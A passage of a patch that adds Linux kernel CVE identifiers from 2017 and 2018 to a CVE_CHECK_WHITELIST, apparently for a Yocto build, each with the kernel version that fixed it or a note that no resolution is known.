+CVE_CHECK_WHITELIST += "CVE-2017-1000"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000111"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000112"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000251"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000252"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000253"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000255"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-1000363"
+
+# fixed-version: Fixed after version 4.12rc6
+CVE_CHECK_WHITELIST += "CVE-2017-1000364"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-1000365"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000370"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000371"
+
+# fixed-version: Fixed after version 4.12rc6
+CVE_CHECK_WHITELIST += "CVE-2017-1000379"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000380"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-1000405"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-1000407"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-1000410"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10661"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10662"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10663"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10810"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-10911"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11089"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11176"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11472"
+
+# fixed-version: Fixed after version 4.13rc2
+CVE_CHECK_WHITELIST += "CVE-2017-11473"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-11600"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-12134"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-12146"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2017-12153"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-12154"
+
+# fixed-version: Fixed after version 4.9rc6
+CVE_CHECK_WHITELIST += "CVE-2017-12168"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-12188"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-12190"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-12192"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-12193"
+
+# fixed-version: Fixed after version 4.13rc4
+CVE_CHECK_WHITELIST += "CVE-2017-12762"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-13080"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13166"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2017-13167"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2017-13168"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13215"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-13216"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2017-13220"
+
+# CVE-2017-13221 has no known resolution
+
+# CVE-2017-13222 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-13305"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-13686"
+
+# CVE-2017-13693 has no known resolution
+
+# CVE-2017-13694 has no known resolution
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13695"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13715"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14051"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14106"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-14140"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14156"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14340"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14489"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-14497"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14954"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2017-14991"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15102"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15115"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15116"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15121"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-15126"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15127"
+
+# fixed-version: Fixed after version 4.14rc8
+CVE_CHECK_WHITELIST += "CVE-2017-15128"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15129"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15265"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15274"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15299"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-15306"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-15537"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-15649"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2017-15868"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15951"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16525"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16526"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16527"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16528"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16529"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16530"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16531"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16532"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16533"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16534"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-16535"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16536"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16537"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16538"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-16643"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16644"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-16645"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16646"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16647"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16648"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16649"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16650"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16911"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16912"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16913"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16914"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-16939"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16994"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16995"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16996"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-17052"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-17053"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17448"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17449"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17450"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17558"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17712"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17741"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17805"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17806"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-17807"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17852"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17853"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17854"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17855"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17856"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17857"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-17862"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17863"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17864"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2017-17975"
+
+# fixed-version: Fixed after version 4.11rc7
+CVE_CHECK_WHITELIST += "CVE-2017-18017"
+
+# fixed-version: Fixed after version 4.15rc7
+CVE_CHECK_WHITELIST += "CVE-2017-18075"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18079"
+
+# CVE-2017-18169 has no known resolution
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18174"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18193"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-18200"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18202"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18203"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18204"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18208"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18216"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18218"
+
+# fixed-version: Fixed after version 4.12rc4
+CVE_CHECK_WHITELIST += "CVE-2017-18221"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18222"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18224"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18232"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18241"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18249"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18255"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18257"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-18261"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-18270"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-18344"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18360"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-18379"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18509"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18549"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18550"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2017-18551"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18552"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2017-18595"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-2583"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-2584"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2596"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-2618"
+
+# fixed-version: Fixed after version 2.6.25rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2634"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-2636"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2647"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-2671"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5123"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5546"
+
+# fixed-version: Fixed after version 4.10rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5547"
+
+# fixed-version: Fixed after version 4.10rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5548"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5549"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5550"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5551"
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2017-5576"
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2017-5577"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5669"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5715"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5753"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5754"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5897"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5967"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5970"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5972"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5986"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-6001"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6074"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-6214"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6345"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6346"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6347"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6348"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6353"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-6874"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6951"
+
+# fixed-version: Fixed after version 4.11rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7184"
+
+# fixed-version: Fixed after version 4.11rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7187"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7261"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7273"
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7277"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7294"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7308"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7346"
+
+# CVE-2017-7369 has no known resolution
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7374"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7472"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7477"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7482"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7487"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7495"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7518"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7533"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7541"
+
+# fixed-version: Fixed after version 4.13rc2
+CVE_CHECK_WHITELIST += "CVE-2017-7542"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-7558"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7616"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7618"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7645"
+
+# fixed-version: Fixed after version 4.11rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7889"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7895"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7979"
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-8061"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8062"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8063"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8064"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8065"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8066"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8067"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8068"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8069"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8070"
+
+# fixed-version: Fixed after version 4.10rc7
+CVE_CHECK_WHITELIST += "CVE-2017-8071"
+
+# fixed-version: Fixed after version 4.10rc7
+CVE_CHECK_WHITELIST += "CVE-2017-8072"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8106"
+
+# fixed-version: Fixed after version 3.19rc6
+CVE_CHECK_WHITELIST += "CVE-2017-8240"
+
+# CVE-2017-8242 has no known resolution
+
+# CVE-2017-8244 has no known resolution
+
+# CVE-2017-8245 has no known resolution
+
+# CVE-2017-8246 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8797"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-8824"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8831"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8890"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8924"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8925"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9059"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9074"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9075"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9076"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9077"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9150"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-9211"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-9242"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-9605"
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2017-9725"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9984"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9985"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9986"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-1000004"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1000026"
+
+# fixed-version: Fixed after version 4.15
+CVE_CHECK_WHITELIST += "CVE-2018-1000028"
+
+# fixed-version: Fixed after version 4.16
+CVE_CHECK_WHITELIST += "CVE-2018-1000199"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2018-1000200"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1000204"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-10021"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-10074"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10087"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10124"
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10322"
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10323"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-1065"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1066"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2018-10675"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-1068"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10840"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10853"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1087"
+
+# CVE-2018-10872 has no known resolution
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10876"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10877"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10878"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10879"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10880"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10881"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10882"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10883"
+
+# fixed-version: Fixed after version 2.6.36rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10901"
+
+# fixed-version: Fixed after version 4.18rc6
+CVE_CHECK_WHITELIST += "CVE-2018-10902"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2018-1091"
+
+# fixed-version: Fixed after version 4.17rc1
